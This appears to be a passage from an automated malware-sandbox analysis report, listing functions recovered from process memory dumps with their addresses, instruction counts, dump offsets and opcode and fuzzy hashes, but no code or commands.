                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 792582b8b2d53e12069d9b5c61583e50d98d908e4bf9975dea2274800b685c74
                                                • Instruction ID: 4c15278f70951506c1e2ef720e9cfb85d50f33dc5cb961825cbac925e1ce8672
                                                • Opcode Fuzzy Hash: 792582b8b2d53e12069d9b5c61583e50d98d908e4bf9975dea2274800b685c74
                                                • Instruction Fuzzy Hash: 5031E331B002208FDB14DB78D555BAE7BB2AF88748B148969D406EB791DF34DC06CBE6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E25F58, Relevance: .1, Instructions: 99COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bbaa774e55ae15cb7b72b93e63f04a27800cb5b9418c724a1d74ad43632af78
                                                • Instruction ID: 84023b8cbf20cd975ccfd98031518a652b8f9c900f044ff38f22f638246e7597
                                                • Opcode Fuzzy Hash: 4bbaa774e55ae15cb7b72b93e63f04a27800cb5b9418c724a1d74ad43632af78
                                                • Instruction Fuzzy Hash: 0E31E331B002208FDB54DB78C555BAE7BB6AF88744B108968D406EB790EF30DC46CBE6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E24E60, Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a901291c749c1070946939ffd3bb580c98d08ebcd83d456289461ef4a34e2df
                                                • Instruction ID: ab38e9287c7dfb820eed424ff822fa9344bc5812317627d19ad2a0f663cf9316
                                                • Opcode Fuzzy Hash: 9a901291c749c1070946939ffd3bb580c98d08ebcd83d456289461ef4a34e2df
                                                • Instruction Fuzzy Hash: 0F31A270E056188FCB04CBA8E9846EEBBF6FF85314F249069D504EB381E731E846CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E290D6, Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53cf758135d7f55b98b0a37ae45dce4decf23d62e55b08218e76e642f3103e19
                                                • Instruction ID: 2cd6a36df35618433e8a55f94827250dc21038a5ef0e5bdb0ce7536dd19327f5
                                                • Opcode Fuzzy Hash: 53cf758135d7f55b98b0a37ae45dce4decf23d62e55b08218e76e642f3103e19
                                                • Instruction Fuzzy Hash: 3021493070D3945FDB016374982A5AE7FA1DF82344F1595BAE880EB693DE29CC06C7D2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E28280, Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 412145da1aa296ec764b1434d9021e50b9a68b2733d9ff8b90020a07d1757dd2
                                                • Instruction ID: 65c9bbc175b53b907a8398c26b034443d498fa7f180b9e61c5f360f1ae28bba5
                                                • Opcode Fuzzy Hash: 412145da1aa296ec764b1434d9021e50b9a68b2733d9ff8b90020a07d1757dd2
                                                • Instruction Fuzzy Hash: 8921A030A04128DFCB04DBB4DA546EE7BB6EF89318F605429E405B7394DF319C44CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DADD3D8, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746077938.000000001DADD000.00000040.00000001.sdmp, Offset: 1DADD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2dccd627d21f0905c5b8a1df876439122fc59419b5ecc13a41fb0c536336003
                                                • Instruction ID: 34ab97bfaf3316a049185faf0f00514f625476540fd6b7fb14b7ef2649fdb445
                                                • Opcode Fuzzy Hash: b2dccd627d21f0905c5b8a1df876439122fc59419b5ecc13a41fb0c536336003
                                                • Instruction Fuzzy Hash: 7121F1B5504740DFDF41CF58D9C0B56BBA9FB88724F20C569D9090B246C33AE856CAE3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DAED01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746170235.000000001DAED000.00000040.00000001.sdmp, Offset: 1DAED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8c65e2cf919d6e6e42a8a957a20ce4cc2b4feec8956eb42a3283fe3e7eb3e1f
                                                • Instruction ID: 1501884d36c2fdbf9a7fff0d351e7597c7867872681411dcfc35dd4064edb1f9
                                                • Opcode Fuzzy Hash: b8c65e2cf919d6e6e42a8a957a20ce4cc2b4feec8956eb42a3283fe3e7eb3e1f
                                                • Instruction Fuzzy Hash: 9321F575604340DFDF01CF6CD980B16BBA5FB84764F28C969D90A4B246C336D847CAA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E2ABFA, Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24dba3e104e08f2565b84390923e6ab4e9bcee1c7a79e9deeab7fef61483ddf5
                                                • Instruction ID: ed40b620e7e6c170fd81f65a0cf3a725cabb6962956d08645bcd7c598ffee26c
                                                • Opcode Fuzzy Hash: 24dba3e104e08f2565b84390923e6ab4e9bcee1c7a79e9deeab7fef61483ddf5
                                                • Instruction Fuzzy Hash: A1215830A006298FCB44DBB8D8856AEFBF2EF88314F198569D405E7350DB3098428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DAED006, Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746170235.000000001DAED000.00000040.00000001.sdmp, Offset: 1DAED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d741668556b92483ebb4aeacb8930bbbb91c9d31bcab795c01d62b5f0c36a8b
                                                • Instruction ID: b1a27b89bf2825929cf10e9a2a85df552e0b2079c0e85536389deeedf87ff025
                                                • Opcode Fuzzy Hash: 3d741668556b92483ebb4aeacb8930bbbb91c9d31bcab795c01d62b5f0c36a8b
                                                • Instruction Fuzzy Hash: 8F2184755083809FCB02CF28D594B15BF71EB46314F28C5EAD8498F256C33AD85ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E25E71, Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 095fc943a6002b78a25676fdb175a05aba01ec0b6282c635de5ebef0f41c5037
                                                • Instruction ID: 9789fee17b6896b8ef0b518c438792980b4a8338e62567df2a89cb4afad867f8
                                                • Opcode Fuzzy Hash: 095fc943a6002b78a25676fdb175a05aba01ec0b6282c635de5ebef0f41c5037
                                                • Instruction Fuzzy Hash: 2D115135B046298FCB50DBBCC8989AEBBF1FF886107118069E909D7351EF349D02CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E29B2E, Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d8151b1599a4bc659a081e665f81a4861b26bb5c9f801d5986d72364f63824e
                                                • Instruction ID: 7ae8e2ada2ce76be6aca7578c38296adf9897058958d9aff896aca94aaba3ee7
                                                • Opcode Fuzzy Hash: 2d8151b1599a4bc659a081e665f81a4861b26bb5c9f801d5986d72364f63824e
                                                • Instruction Fuzzy Hash: D2118C31B046259FCB40EBBCD8459AEBBF6BF89610B508469E409E7301EB30A902CBC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1DADD3D3, Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156746077938.000000001DADD000.00000040.00000001.sdmp, Offset: 1DADD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1894b04319b26d9e6a5a230591f1987155873eea21a2ddd67077fda4df389574
                                                • Instruction ID: 994f4b4b170958f179879420a900bc42a62f3282e35801a18eb7bb9a165e8af9
                                                • Opcode Fuzzy Hash: 1894b04319b26d9e6a5a230591f1987155873eea21a2ddd67077fda4df389574
                                                • Instruction Fuzzy Hash: 2611B1B6504780DFCB01CF14D5C4B16BF72FB84324F24C6A9D9090B656C33AE456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E27908, Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2dee003c43e4b984b8a3664a9bcdeffba759f02cad7e1a785bd203caf5917b11
                                                • Instruction ID: 5d3426f23bec090e12944952ad4df884647af4e9c8541b85876f5c5ba33269b0
                                                • Opcode Fuzzy Hash: 2dee003c43e4b984b8a3664a9bcdeffba759f02cad7e1a785bd203caf5917b11
                                                • Instruction Fuzzy Hash: D6110931B046298F8B40EBBCD945AAEB7F6BF886107508469E509E7354EB34AD068B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E25E80, Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7df88ef5857d7ed889a84c95c9258376f94e0d33f59a7c3259f1d7a676261b2a
                                                • Instruction ID: 323f79e8061b2188708afca59b6d490b050ab79692509724e51fa74d98dc1fb5
                                                • Opcode Fuzzy Hash: 7df88ef5857d7ed889a84c95c9258376f94e0d33f59a7c3259f1d7a676261b2a
                                                • Instruction Fuzzy Hash: 14111F35B041298FCB80DFBCC9989AEB7F6BF886617108029D509E3310EF349D02CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E29B38, Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b50ad6130d8fb563a24d464714b737c70c9a1e18f0109ffb70de15c2aa146da
                                                • Instruction ID: bcb55770a97398cac3bea1056dd3f688c59ef404c6dc5cb43e70f4a9cf776e6e
                                                • Opcode Fuzzy Hash: 0b50ad6130d8fb563a24d464714b737c70c9a1e18f0109ffb70de15c2aa146da
                                                • Instruction Fuzzy Hash: 1A110C31F045298F8B40EBBCD945AAEB7F6BF89610B508469E509E7341EB349D06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E24DD9, Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: baff337748708abfe7d8cfd353937351a80173a1e13368c7f40a839caeccfaf7
                                                • Instruction ID: f92ce7eff6db054ad7a61b4c423e2e8c9a728a9ec6f77004828474506e43f4c8
                                                • Opcode Fuzzy Hash: baff337748708abfe7d8cfd353937351a80173a1e13368c7f40a839caeccfaf7
                                                • Instruction Fuzzy Hash: 1AF0A071E011258FCB909FBD98081EEBFF5EA88221B15817AE95AD3641D6300916CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E24DE8, Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 014f8f9cada3a2fa6f177fde1ce21790dc1588d14ce6a0fb13eb59e283ea19fb
                                                • Instruction ID: ed9484c46b214b920ddba0753a7a490fabdd7b7593a171e03503b079d19d1e6a
                                                • Opcode Fuzzy Hash: 014f8f9cada3a2fa6f177fde1ce21790dc1588d14ce6a0fb13eb59e283ea19fb
                                                • Instruction Fuzzy Hash: FDE04871E001299F8B50DFBD98445EF7FF9EA8C261B150076E61DE3300EA704911CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E27967, Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 196100b63fb2ffbe62b0205b2decb7d17f08561f85442e5ee8eb0bca4baea9f8
                                                • Instruction ID: b30af392fe7000c6ccad867a61e820561a199f0e76fd4c7890268f271649cce5
                                                • Opcode Fuzzy Hash: 196100b63fb2ffbe62b0205b2decb7d17f08561f85442e5ee8eb0bca4baea9f8
                                                • Instruction Fuzzy Hash: 61E0C236B041288B8F04EBF8E8559DDB3F2BB883247216164E54AF7251EA349C468BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E25EE1, Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62a6b61800aa17d164d23445b52b2d7686783900085a102042377e586754ec12
                                                • Instruction ID: ba5482d32ef77626d91ca8d14ab4cbeb81484172c2421020f2dda7a04c971abe
                                                • Opcode Fuzzy Hash: 62a6b61800aa17d164d23445b52b2d7686783900085a102042377e586754ec12
                                                • Instruction Fuzzy Hash: 9AF0F235B000298BCB40DBA8D89899DB7B2BF886667104025EA0AE3321EF359C12CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E29B97, Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb79e1605f47215ec7158724e01a9bb36c2cc783087481c236746062430a7dfb
                                                • Instruction ID: e58ec53f3b580f1617183683a30b0d99a15252dec4df15e4002d294465c57df0
                                                • Opcode Fuzzy Hash: bb79e1605f47215ec7158724e01a9bb36c2cc783087481c236746062430a7dfb
                                                • Instruction Fuzzy Hash: C2E0E536B040288B8F04FBF8E8559DDB3F5BF89724B605164E509F7251EF349C028BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00E2609A, Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.156735429019.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5157ae10dbaa23a401f9c3db7e263dda5edec201aebb7e672563b21ed529239f
                                                • Instruction ID: 3b19c69c80ebcbacf716a66698467262ebbb9dec70fe65787120c94167a84954
                                                • Opcode Fuzzy Hash: 5157ae10dbaa23a401f9c3db7e263dda5edec201aebb7e672563b21ed529239f
                                                • Instruction Fuzzy Hash: A1D01236F01114CBCF04ABF0F8880DCB736FF8123A7100879D506A2521DB324865CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions